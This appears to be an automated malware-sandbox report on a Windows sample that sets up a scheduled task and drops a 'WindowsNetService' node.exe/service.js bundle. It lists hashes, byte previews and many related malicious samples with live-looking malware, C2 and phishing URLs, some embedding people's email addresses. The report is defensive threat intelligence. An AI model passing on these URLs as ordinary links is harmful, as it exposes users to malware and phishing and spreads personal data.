                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        10:17:42API Interceptor1x Sleep call for process: z5i6tLOUD0.exe modified
                                                                                                                                                        10:17:45Task SchedulerRun new task: Nafdfnasia path: "C:\Users\user\AppData\Roaming\cmd32.exe"
                                                                                                                                                        10:17:59API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                        10:18:55API Interceptor8x Sleep call for process: WMIC.exe modified
                                                                                                                                                        10:19:00API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                        10:19:27API Interceptor8x Sleep call for process: svchost.exe modified

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        188.114.96.3SecuriteInfo.com.NSIS.Injector.AOW.tr.27003.exeGet hashmaliciousBrowse
                                                                                                                                                        • cihno.shop/PL341/index.php
                                                                                                                                                        SecuriteInfo.com.Win32.Malware-gen.7466.exeGet hashmaliciousBrowse
                                                                                                                                                        • tixfilmz.ga/PWS/fre.php
                                                                                                                                                        06 crypt.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.nhacaim88viet.xyz/sjit/?7nLpVrQ=bpJ2AuxGpxeatXHB9/iw4WELzXgZSdm3gXKYL7TfMGWJXUQnCBZbsJmtGloB/JivFEJgBwT0t94ZR2YfDpstWIuCggTKwFZWtg==&gV7=iN9TV
                                                                                                                                                        Ordine R04-T4077 TBA-2022, pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.ikoyslot4d.com/e65x/?-ZYH=9t4xM4ze5D9sSgmcMJM82YCPJr/CJkOXYl3jBf16WYgvzcRgRJoOjM+ChPN1gkjeji7LrCwrImwwmOIMME/InKLS9VqJKfDS/A==&DZT=uVMd
                                                                                                                                                        jQegXWWQ3V.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.agenlexispkr.xyz/wuha/?w0Dl4fR8=sI34YYiaSFSRPyby7O8NbCzQCuULst05TLHASheG+uv4cbdo2QKafVAKSNDD67nHf1SuJdGGhUcNXz7jMZXDgXRy1RJOSZzjIA==&LJ=00DdVL0
                                                                                                                                                        Letter of approval.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.6vrueh.xyz/gkp9/?3fKPXR=cXidRhXzuCkSmnlUSPeK0y+lKZhFpgyBGzZfPAMk/kDJnmjzt799f7bWx8Tgyu0vMC8xIILXGApGtBBovJYPzB3j0tgpwsXhFw==&Ez=4hLlw8rpP0oTZDt
                                                                                                                                                        Request for 3 family.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.koinslot888.tech/rsea/?7nXX=IgNhV7Q0EIr5SWCRcvdql8E71Pwt+H14ClVvdwRmPY3rsL4cVyrowJmcdBgbXOJH93p/&p0=ntzH0LwpNvVXcL
                                                                                                                                                        Strandpiberen.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.class888hk.com/nzec/?-ZJp=+nrQS92RuIHY8typGZ51XfAzKPzU8x2OQHibQgBmlmK6aXEbcAEYsl3/TubgKsrO8lkUYh11QpQh8AgGtLuxirHhrbVWBZT+7g==&7nYx_=3fCTW
                                                                                                                                                        PQR-70993-317.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.88bet6677.com/sg94/?qT=2g6pE+fZkhcTs2D4RiOpEC/miaiOoG87p/3d0j5X3VxL1qKWCOaNRIfoN8EgmJHK9njz&z8=R4842XmHD4aDSdJP
                                                                                                                                                        EUR Odeme Plani.exeGet hashmaliciousBrowse
                                                                                                                                                        • zconnect.shop/PL341/index.php
                                                                                                                                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.mydappsync.net/b29a/?UpXh7=UG7byPYd0+bfdzeR90V2GOIPV9gSWZmS2NG2jvwPtscCRSnn+/FN22jVitchwOeDNzoA&DDK0V=5jZXvvqpGF1xWBUp
                                                                                                                                                        sM6UPyyNir.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.himmerlandgolf.dk/
                                                                                                                                                        6sfNp0TMe9.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.himmerlandgolf.dk/
                                                                                                                                                        l8YrDt0zS5.exeGet hashmaliciousBrowse
                                                                                                                                                        • dna-cp.com/
                                                                                                                                                        35KGki4A3O.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.himmerlandgolf.dk/
                                                                                                                                                        https://sharepoint.sudsafe.com/S54788NW45754Y7SU435MEW54MDS54788NW45754Y7SU435MEW54MD568ID568I568I568M58DM58S54788NW45754Y7SU435MEW54MD568ID568I568I568M58DM58568ID568I568I568M58DM58/?auth=bugreport@qualys.comGet hashmaliciousBrowse
                                                                                                                                                        • sharepoint.sudsafe.com/wp-content/uploads/2022/07/555.jpg
                                                                                                                                                        SecuriteInfo.com.Gen.Variant.Nemesis.10313.16738.22829.exeGet hashmaliciousBrowse
                                                                                                                                                        • cihno.shop/PL341/index.php
                                                                                                                                                        tGQ9T8Athj.exeGet hashmaliciousBrowse
                                                                                                                                                        • dna-cp.com/
                                                                                                                                                        Rk3R1RBX9x.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.himmerlandgolf.dk/
                                                                                                                                                        M6r4CJqwMd.exeGet hashmaliciousBrowse
                                                                                                                                                        • www.himmerlandgolf.dk/

                                                                                                                                                        Domains

                                                                                                                                                        No context

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        CLOUDFLARENETUSDemurrage_INV.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.18.114.97
                                                                                                                                                        Colt Policy.htmlGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.216.137
                                                                                                                                                        US$ 10700.docx.docGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.74.17
                                                                                                                                                        remittance information.docx.docGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.167.140
                                                                                                                                                        US$ 10700.docx.docGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.167.140
                                                                                                                                                        remittance information.docx.docGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.167.140
                                                                                                                                                        https://storageapi.fleek.co/33788173-3044-4331-ac19-2bb789eb34e5-bucket/sam/common/oauth2/?authoriseclient_id=4315ab9-913as3-40a0u-a4ut6-3536ade03&redirect_uri=https%3A%2F%2Fwww.office.com%2Flanding&response_type=code%20id_token&scope=openid%20profile&response_mode=form_post&nonce=637471761361998550.YTE5MmQzYzMtNTg2MS00NzQ4LTg5ZWQtOWQ3OGJiMjQ1MmE0MmUxOTg5NTQtYjFkOC00ZjhiLTlmMTUtMGE4ZTA0NWQyNzI2&ui_locales=en-US&mkt=en-US&client-request-id=68f9d7da-5456-46658e-88as69ads-06sad18ads19dsa076edb&state=Kck8msXjhXilh8v4_zjTdU2Y8mdE3_0__tttyi04kcOXzJoTHhQ1svBKB-jRrfgaTOJmXRCbtJ4MhyVHer_lbBxIQc1fngPy2KQ1PDy2bRhgW_B3CQiu4mC74gX2xXAL6ED040X0fitKWb16s7_lvfa_dHgwLhDdAj8YYTfOkJ-i_gR_Vwq9JV-PmXDli6FPm9jIY96qfojSHj9E_eYH4gsoIRDeKVRNQ456O12eZeHh8XklcKhwhMC0I5RWqoreJnf8ulumuhrlbzuxmIXBiQ&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.8.0.0Get hashmaliciousBrowse
                                                                                                                                                        • 104.18.7.145
                                                                                                                                                        SecuriteInfo.com.Win32.RATX-gen.24895.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.18.114.97
                                                                                                                                                        https://traninmovimento-my.sharepoint.com/:o:/g/personal/receptionognissanti_alegragroup_it/EjKWIPMMtPxLp7GMqSlDOYwB2vnqrXa7sn5YQh2olg7uzA?e=fc0ZLxGet hashmaliciousBrowse
                                                                                                                                                        • 104.17.25.14
                                                                                                                                                        SecuriteInfo.com.NSIS.Injector.AOW.tr.27003.exeGet hashmaliciousBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        SecuriteInfo.com.NSIS.Injector.AOW.tr.32496.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.184.5
                                                                                                                                                        https://zii.to/checkdetailsGet hashmaliciousBrowse
                                                                                                                                                        • 23.227.38.65
                                                                                                                                                        hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.134.233
                                                                                                                                                        https://djkdv.safelinkbpm.com/c/nycbapQgB0aXfqv51C6oqAGet hashmaliciousBrowse
                                                                                                                                                        • 104.17.24.14
                                                                                                                                                        Cheatuser74.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.22.0.235
                                                                                                                                                        Voicemail746434358.htmGet hashmaliciousBrowse
                                                                                                                                                        • 104.18.11.207
                                                                                                                                                        Voicemail746434358.htmGet hashmaliciousBrowse
                                                                                                                                                        • 104.18.11.207
                                                                                                                                                        https://mailchi.mp/aba300a4b048/new-informationGet hashmaliciousBrowse
                                                                                                                                                        • 104.16.149.64
                                                                                                                                                        FveF8nauvN.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.130.233
                                                                                                                                                        SecuriteInfo.com.Variant.Tedy.200463.8682.12520.exeGet hashmaliciousBrowse
                                                                                                                                                        • 162.159.129.233
                                                                                                                                                        DIGITALOCEAN-ASNUS6i5ptcXlAk.exeGet hashmaliciousBrowse
                                                                                                                                                        • 159.65.11.164
                                                                                                                                                        Mzr2l76rl8.dllGet hashmaliciousBrowse
                                                                                                                                                        • 138.197.151.48
                                                                                                                                                        Invoice-Sep-09-document-175-scan.zipGet hashmaliciousBrowse
                                                                                                                                                        • 67.205.140.135
                                                                                                                                                        channeling.dat.dllGet hashmaliciousBrowse
                                                                                                                                                        • 67.205.140.135
                                                                                                                                                        channeling.dat.dllGet hashmaliciousBrowse
                                                                                                                                                        • 67.205.140.135
                                                                                                                                                        botx.arm.elfGet hashmaliciousBrowse
                                                                                                                                                        • 206.189.30.130
                                                                                                                                                        https://api.tribecrm.nl/public/email/8f3a9099-ca0b-4a98-8d1c-fb357c975f5e/link?d=aHR0cHM6Ly9oYm94eC50b3AvP2U9WVdoaGNuSnBjMjl1UUhSbFoyNWhMbU52YlE9PQ==Get hashmaliciousBrowse
                                                                                                                                                        • 138.68.21.224
                                                                                                                                                        http://ref.webhostinghub.com/scripts/click.php?desturl=https://avitmfg.co/jiv/#bmVoYS5wYWh1amFAY29sdC5uZXQ=Get hashmaliciousBrowse
                                                                                                                                                        • 46.101.4.96
                                                                                                                                                        SecuriteInfo.com.Variant.Barys.30112.3657.23804.exeGet hashmaliciousBrowse
                                                                                                                                                        • 157.245.246.87
                                                                                                                                                        sprinkling.dll.dllGet hashmaliciousBrowse
                                                                                                                                                        • 138.197.151.48
                                                                                                                                                        sprinkling.dll.dllGet hashmaliciousBrowse
                                                                                                                                                        • 138.197.151.48
                                                                                                                                                        http://tracking.e-learmnignsd.com/tracking/click?d=kfUhOHW5WaJiAyNVZNCjQ1Elf4YpCEWVTaDsoMhrH0uz6STfvkf_htntQbG8jUODb7rfv5hiFvFj4rEKhV9f7XGRgLsqnmvAyAHFDFI0jk3ypOLnnom55fbeboApeZ03CljiLieZK8AtddDCTocBBARSNxAYK8LCDp41ZyHZJktliyaUD5limx7SE6VQ8VHNd8jmk3_dNExhkV_Q-WC2viQ1Get hashmaliciousBrowse
                                                                                                                                                        • 162.243.82.235
                                                                                                                                                        https://ascendance.staging.tempurl.host/wp-word/#evanzee@rdgusa.comGet hashmaliciousBrowse
                                                                                                                                                        • 167.172.92.165
                                                                                                                                                        HSBC Customer Information.com.exeGet hashmaliciousBrowse
                                                                                                                                                        • 134.122.29.25
                                                                                                                                                        https://sfo3.digitaloceanspaces.com/teend9blck0nx1v8a88qu016a40x/%21%21%21%21%29%21%28%24%21%29%24%21%21%40/%26%21%24%29%21%40%26%21%26.html#mchealth@monroecounty.govGet hashmaliciousBrowse
                                                                                                                                                        • 138.68.34.161
                                                                                                                                                        j8wyMRzQ5w.elfGet hashmaliciousBrowse
                                                                                                                                                        • 167.99.218.114
                                                                                                                                                        r83s4zyP3A.elfGet hashmaliciousBrowse
                                                                                                                                                        • 167.99.218.114
                                                                                                                                                        prepossessing.dll.dllGet hashmaliciousBrowse
                                                                                                                                                        • 138.197.151.48
                                                                                                                                                        prepossessing.dll.dllGet hashmaliciousBrowse
                                                                                                                                                        • 138.197.151.48
                                                                                                                                                        countervailing.dll.dllGet hashmaliciousBrowse
                                                                                                                                                        • 138.197.151.48

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\_isetup\_setup64.tmpwinscp438setup.exeGet hashmaliciousBrowse
                                                                                                                                                          setup.exeGet hashmaliciousBrowse
                                                                                                                                                            5YB5dKZ1Ow.exeGet hashmaliciousBrowse
                                                                                                                                                              1dGBb5N0oG.exeGet hashmaliciousBrowse
                                                                                                                                                                https://v2-hbconnect.website/order_create_596807_15-07-2022_14-32-02.zipGet hashmaliciousBrowse
                                                                                                                                                                  setup.exeGet hashmaliciousBrowse
                                                                                                                                                                    BPtHMWjgi3.exeGet hashmaliciousBrowse
                                                                                                                                                                      SecuriteInfo.com.Adware.Babylon.15.13567.exeGet hashmaliciousBrowse
                                                                                                                                                                        1899OIwxiA.exeGet hashmaliciousBrowse
                                                                                                                                                                          iJh2yh3La8.exeGet hashmaliciousBrowse
                                                                                                                                                                            KCR2JIl6tT.exeGet hashmaliciousBrowse
                                                                                                                                                                              orbit-4-1-1-18-en-win.exeGet hashmaliciousBrowse
                                                                                                                                                                                CCMaker.exeGet hashmaliciousBrowse
                                                                                                                                                                                  fa#U2310.exeGet hashmaliciousBrowse
                                                                                                                                                                                    veraport-g3-x64 (1).exeGet hashmaliciousBrowse
                                                                                                                                                                                      yusetup7.exeGet hashmaliciousBrowse
                                                                                                                                                                                        LruEqu1rpq.exeGet hashmaliciousBrowse
                                                                                                                                                                                          fileinjector_696428535.exeGet hashmaliciousBrowse
                                                                                                                                                                                            zettelkasten-basics_484588750.exeGet hashmaliciousBrowse
                                                                                                                                                                                              Synapse-X-Cracked_460637337.exeGet hashmaliciousBrowse

                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                C:\Program Files (x86)\WindowsNetService\node.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\wns22DB.tmp
                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6887560
                                                                                                                                                                                                Entropy (8bit):7.995378654994156
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:196608:QLqzi3tI29TS60FIEPgaJzR1VOoaOVxRtx:QLqzi3XT0uEp/ooaWzx
                                                                                                                                                                                                MD5:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                SHA1:86D54874CC8976CDB75A9DC8DCD817AF50837796
                                                                                                                                                                                                SHA-256:79AC7AE94231A392D27F303418E305A60C4194DBBE143C5DEFFC977C7B2E7A78
                                                                                                                                                                                                SHA-512:EF2B54B46844CFB13CFDEF6271E2A8B4E646D2E31CA55229E5C76CA90C649895533BC8FB83C4D50DD3721ABB2A5E4C5EE32DF5C4540E1C14498A5E9B550D3189
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.........$c..J0..J0..J0..I1..J0..O1..J0..N1..J0E~.0..J0..I1..J0..O1Z.J0..N1..J0~.I1..J0..J0..J0~.O1>.J0~.N1..J0..K1..J0..K0..J0~.C1..J0~.J1..J0~..0..J0...0..J0~.H1..J0Rich..J0................PE..L...m.Kb..................f..0....H.0X....H..p....@.......................................@...........................^.....P........p..P+......................,............................d......0d..............................................UPX0......H.............................UPX1......f...H...f.................@....rsrc....0...p...0....f.............@......................................................................................................................................................................................................................................................................................................................3.96.UPX!....

                                                                                                                                                                                                C:\Program Files (x86)\WindowsNetService\service.js

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\wns22DB.tmp
                                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):191726
                                                                                                                                                                                                Entropy (8bit):5.402947843639482
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:KRBZA6XY7Id46ywQlR2WqLIeZH+/j4A3NuVq/tPT/iZc4HJn2YCsqoMi6fX:qBZA6XmId46yAWqLIeuj4eNTPT/iZc4a
                                                                                                                                                                                                MD5:D0BA157ED94AE9AF534FB736C1736F21
                                                                                                                                                                                                SHA1:398F9DECF25A8B210BD073AD23CED6A4A327607C
                                                                                                                                                                                                SHA-256:AF02ABAF88D6FC700C36128B42593C81711972639EA41E70C49C6894AA746747
                                                                                                                                                                                                SHA-512:E657857F425D475A1A5663B25F3B4761696AAA19EF8D614021CDE1411D29F8A358BEAEB3ED593F695890441E79D62575111078120F4E50CD79151E5E04B79802
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:"use strict";var Vo=require("events"),Xo=require("https"),Ko=require("http"),Jo=require("net"),Yo=require("tls"),Qo=require("crypto"),ii=require("stream"),Zo=require("url"),ea=require("zlib"),ta=require("dgram"),Zr=require("os"),es=require("path"),ts=require("child_process"),Et=require("fs"),ra=require("assert"),sa=require("buffer"),oi=require("util"),na=require("dns"),ia=require("http2");function te(t){return t&&typeof t=="object"&&"default"in t?t:{default:t}}var ve=te(Vo),rs=te(Xo),mt=te(Ko),bt=te(Jo),ss=te(Yo),Yt=te(Qo),le=te(ii),wt=te(Zo),ns=te(ea),oa=te(ta),vt=te(Zr),St=te(es),ai=te(ts),Ye=te(Et),aa=te(ra),ci=te(sa),Qe=te(oi),ca=te(na),is=te(ia),K=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function la(t){return t&&t.__esModule&&Object.prototype.hasOwnProperty.call(t,"default")?t.default:t}function fa(t){throw new Error('Could not dynamically require "'+t+'". Please configure the dynamicRequireTargets or/and ignoreDyna

                                                                                                                                                                                                C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\wns22DB.tmp
                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):121344
                                                                                                                                                                                                Entropy (8bit):6.368272862456959
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:GB71pvOGtPSxyrvL9lHYGPrZPUySeqFUezNril2qhs0buZh1n:GBRpxSxyHYG2lFUcifo
                                                                                                                                                                                                MD5:C48855FE677EB4D5C999C01ECCFDB0BC
                                                                                                                                                                                                SHA1:FA5D96CBDE348756B0B9B10D5AB139913E636831
                                                                                                                                                                                                SHA-256:E721FCE186944A3A5C0E822DD4BA71754B217F9CD153707C49D76FCFCB297C06
                                                                                                                                                                                                SHA-512:ADF3D91C123240B1FFC5EAAE9AFB4D512D272B1C76F3AC89D2088E30F3F456C46A8141155890097B237E1D6E385514FC1D2D4B9A2C3A78A601DD741CD461877E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z..F..............................L...;..L......L................l.........H..........Rich...........PE..L.....b.................8...........".......P....@.......................... ............@.....................................P...................................L...............................h...@............P...............................text....7.......8.................. ..`.rdata...~...P.......<..............@..@.data...,...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vbc.exe_54491368af7715c12dfed16f4de8ee34d35db7f8_b5adf338_14b2e68e\Report.wer

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                Entropy (8bit):0.6321651164182989
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:2qFkCJ0HCbv1Dg/dSspXIQcQzc6CmcE1cw3CmG/+HbHsZAXGng5FMTPSkvPkpXmb:Fis0vHNXfXjl/u7s7S274ItZ7D
                                                                                                                                                                                                MD5:457121517530AB652BCC8A7EEE4D8123
                                                                                                                                                                                                SHA1:D4F7C816E7DF5F7FA5FC250699CA4C13AEF8073C
                                                                                                                                                                                                SHA-256:23F5F931EDAD402F11C82B970F2C40D0472587FCAFD4DD72A6F0FEFE277893E2
                                                                                                                                                                                                SHA-512:199F3B6A61A05183CCCD523FCE773F5CF9B489D9F159BE982540AF60171AD5DF56903CAABADAABB7B6E620E0B762AD966495000C6D57059D621265540523E88D
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.7.4.7.6.6.7.2.2.7.8.1.7.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.7.4.7.6.6.7.8.2.3.1.2.8.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.d.e.5.c.a.6.-.d.6.a.9.-.4.c.e.3.-.b.a.e.6.-.2.1.4.1.c.1.8.3.9.5.4.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.a.e.4.5.3.9.-.e.0.0.1.-.4.7.5.1.-.a.3.5.3.-.5.5.2.3.f.8.3.f.f.1.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.b.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.v.b.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.a.c.-.0.0.0.1.-.0.0.1.a.-.a.e.b.e.-.6.5.9.3.c.b.c.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.7.b.1.a.c.7.4.7.e.7.7.0.5.a.2.1.a.c.d.d.5.8.2.b.6.3.8.0.0.0.1.6.b.e.2.1.7.7.4.!.v.b.c...e.x.e.....T.a.

                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8A6.tmp.dmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Sep 12 17:17:55 2022, 0x1205a4 type
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):18226
                                                                                                                                                                                                Entropy (8bit):1.9454156084581231
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:5e8D8M/YNpPiri7wF5oLaUgt/s9AzV2lETcPWWI3WIXmIZUT8O:TzQpqrO+oeUq/sAzMlETBUTf
                                                                                                                                                                                                MD5:BC09665F0DDCDF715BA70DB0CD1E3E3D
                                                                                                                                                                                                SHA1:8AB9083D3636A4FC5F80F75F8CEB79B56C86EAAF
                                                                                                                                                                                                SHA-256:C31EEBA3C1C9748C203C39805ED111BAE277E598A6E1C437FAFD701B867011CE
                                                                                                                                                                                                SHA-512:F369EC2C13C2D7D4A43B8F2B081115F26C681DC3C038D90AD8B7A31058DA837BB8814464E0125311D6B1C4585264A970F2A200BBDBDF8F95CD4BD5485FBAC3D2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MDMP....... ........i.c............4...............<.......D...~...........T.......8...........T...............B@...........................................................................................U...........B......t.......GenuineIntelW...........T............i.c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8A4.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):8324
                                                                                                                                                                                                Entropy (8bit):3.688585015133087
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:Rrl7r3GLNigCjV627le6Ygm6gm/gmfz1S3OnCpDD89bpD+sfODm:RrlsNig0V6R6YJ6gm/gmfz1S3OLpD9fb
                                                                                                                                                                                                MD5:6080ACACF3750C89E11303689FBEE6AA
                                                                                                                                                                                                SHA1:494BFDC2E1DDAF6A6C85CA64A5ED62EED4E6786F
                                                                                                                                                                                                SHA-256:45B830938AC4A3203D72AEA9365A037725457DD2550894812EEF0836233FA438
                                                                                                                                                                                                SHA-512:1C634654ECF9D18B50D9FC094261F95990D0F300C61BEBE37BA89EAF13C7FF948B33752303F2ED13013F913E436D56FC1A25CDCE6DB4A36EF3AFEA97C2B20609
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.4.4.<./.P.i.d.>.......

                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB93.tmp.xml

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4700
                                                                                                                                                                                                Entropy (8bit):4.415762105034311
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:cvIwSD8zsWJgtWI9FRWgc8sqYj98fm8M4JapFn+q8v4+Wd4Hd:uITfsWAgrsqYuJUK3E4Hd
                                                                                                                                                                                                MD5:66469BB31BC0AA1B10948347C86C7C0F
                                                                                                                                                                                                SHA1:E0A1665063F0B5206CC00C9D4A748AA1B51FAED5
                                                                                                                                                                                                SHA-256:56857136433BAA2C761A55A30C4228EA99944A408629BABCC3580CEF2F910A69
                                                                                                                                                                                                SHA-512:93BEA88862C08467168132A291B5D6CF60ACC3A74FFF0DB09E96EE73D7704BB000B9AAB70C89B927743D7D82AD12E18D3EDE6B29048882EDD36272E16C1E546A
                                                                                                                                                                                                Malicious:false
